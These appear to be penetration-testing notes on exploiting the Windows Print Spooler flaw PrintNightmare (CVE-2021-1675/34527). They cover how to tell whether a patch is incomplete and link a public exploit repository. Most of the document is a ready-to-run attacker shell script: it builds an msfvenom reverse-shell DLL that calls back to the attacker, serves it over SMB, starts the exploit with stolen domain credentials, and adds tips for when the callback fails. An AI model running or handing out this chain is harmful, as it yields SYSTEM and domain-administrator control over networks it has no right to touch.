Requirements

  • domain user (any authenticated account; no special rights needed)
  • unpatched target running the Print Spooler service (enabled by default on workstations, member servers and domain controllers; every supported Windows version was affected before the June/July 2021 updates, Server 2019 included)
  • caveat: Microsoft's July 2021 fix is only complete if Point and Print is restricted too. A patched host with NoWarningNoElevationOnInstall or UpdatePromptSettings set to 1 under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint remains exploitable, so check those values (0 or absent is the safe state) before writing a target off as patched

PrintNightmare (CVE-2021-1675, later split into CVE-2021-34527) is a flaw in the Windows Print Spooler: the RpcAddPrinterDriverEx call (MS-RPRN) and its asynchronous twin RpcAsyncAddPrinterDriver (MS-PAR) let any authenticated domain user remotely install a printer "driver" DLL fetched from a UNC path, and the spooler then loads that DLL as SYSTEM. Because the spooler runs by default on domain controllers, pointing the exploit at a DC yields SYSTEM on the DC, which is domain-administrator-equivalent control. Microsoft shipped a first fix in June 2021 (CVE-2021-1675) and an out-of-band update in July 2021 (CVE-2021-34527).

To exploit: generate a reverse-shell DLL with msfvenom (x64 for a 64-bit target, since the spooler loads it in-process), host it with Impacket's smbserver.py (pass the -smb2support flag; the spooler will not fall back to SMB1), start a listener for the callback, then run the script below against the target.

Use cube0x0's script to exploit (a domain username and password are required; the repo README shows the exact invocation): GitHub - cube0x0/CVE-2021-1675: C# and Impacket implementation of PrintNightmare, https://github.com/cube0x0/CVE-2021-1675. The Python version expects cube0x0's patched Impacket fork (it adds the MS-PAR bindings), so install that fork first if the script fails on import.
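The full attacker-side chain from the steps above (pre-check, DLL, SMB share, exploit script) as an added shell example; this is not code from these notes or from the cube0x0 repository. The tools it calls are real (msfvenom, Impacket's smbserver.py and rpcdump.py, the repo's CVE-2021-1675.py), but EXPLOIT_DIR, the share and DLL names, and every address and credential are placeholders. It also adds a check the notes skip: querying the endpoint mapper with rpcdump.py for the MS-RPRN / MS-PAR interfaces before firing, using a constructed sample of rpcdump output to show what a hit looks like.

```shell
#!/bin/sh
# PrintNightmare (CVE-2021-1675 / CVE-2021-34527) attacker-side workflow.
# Added example; not from the original notes nor from cube0x0/CVE-2021-1675.
# Assumes msfvenom, Impacket's smbserver.py and rpcdump.py, and the repo's
# CVE-2021-1675.py (directory given in EXPLOIT_DIR) are installed. All IPs,
# share/DLL names and credentials below are placeholders.
set -eu

# Decide from rpcdump.py output (read on stdin) whether the target exposes the
# spooler RPC interfaces the exploit drives: MS-RPRN (RpcAddPrinterDriverEx)
# or MS-PAR (RpcAsyncAddPrinterDriver). Returns 0 if either is listed.
spooler_exposed() {
    grep -qE '\[MS-RPRN\]|\[MS-PAR\]'
}

# Live check against a host; an anonymous endpoint-mapper query is usually enough.
check_target() {
    rpcdump.py "@$1" | spooler_exposed
}

# Build the UNC path the target's spooler will fetch the driver from. The
# exploit script takes it literally as \\<attacker-ip>\<share>\<dll>; a path
# with the wrong slashes makes the driver install fail without a callback.
dll_unc_path() {
    printf '\\\\%s\\%s\\%s\n' "$1" "$2" "$3"
}

# Constructed sample of rpcdump.py output for a host with the spooler running
# (the UUIDs are the real MS-RPRN / MS-PAR interface IDs; host and port invented).
SAMPLE_RPCDUMP='Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0
Bindings:
          ncacn_ip_tcp:10.10.10.20[49668]
          ncacn_np:\\DC01[\pipe\spoolss]

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Provider: spoolsv.exe
UUID    : 76F03F96-CDFD-44FC-A22C-64950A001209 v1.0'

# Full chain. Start a listener in another terminal first, e.g.  nc -lvnp 4444
# then:  run_printnightmare 10.10.10.20 'lab.local/jdoe:Passw0rd' 10.10.14.5 4444
run_printnightmare() {
    target="$1"; creds="$2"; attacker_ip="$3"; lport="${4:-4444}"
    share=share; dll=rev.dll
    workdir="$(mktemp -d)"

    check_target "$target" || { echo "[-] $target does not expose MS-RPRN/MS-PAR"; return 1; }

    # 1. Reverse-shell DLL. The spooler loads it in-process as SYSTEM, so the
    #    architecture must match the target (x64 for any modern server).
    msfvenom -p windows/x64/shell_reverse_tcp LHOST="$attacker_ip" LPORT="$lport" \
        -f dll -o "$workdir/$dll"

    # 2. Host it. -smb2support is mandatory: current spoolers will not speak SMB1.
    smbserver.py -smb2support "$share" "$workdir" &
    smb_pid=$!
    trap 'kill "$smb_pid" 2>/dev/null; rm -rf "$workdir"' EXIT

    # 3. Fire: authenticate as the low-privileged domain user and ask the
    #    spooler to install "our driver" from the UNC path.
    python3 "${EXPLOIT_DIR:-.}/CVE-2021-1675.py" "${creds}@${target}" \
        "$(dll_unc_path "$attacker_ip" "$share" "$dll")"
}

# Only run the chain when invoked with arguments, so the helpers can be sourced.
if [ "$#" -ge 3 ]; then
    run_printnightmare "$@"
fi
```

The shell that comes back runs as NT AUTHORITY\SYSTEM, not as the domain user you authenticated with. One practical caveat: newer Windows builds refuse unauthenticated (guest) SMB shares by default, so if the driver install completes with no callback, place the DLL on the target through some other writable path and pass that local path to the script instead of the smbserver.py UNC path.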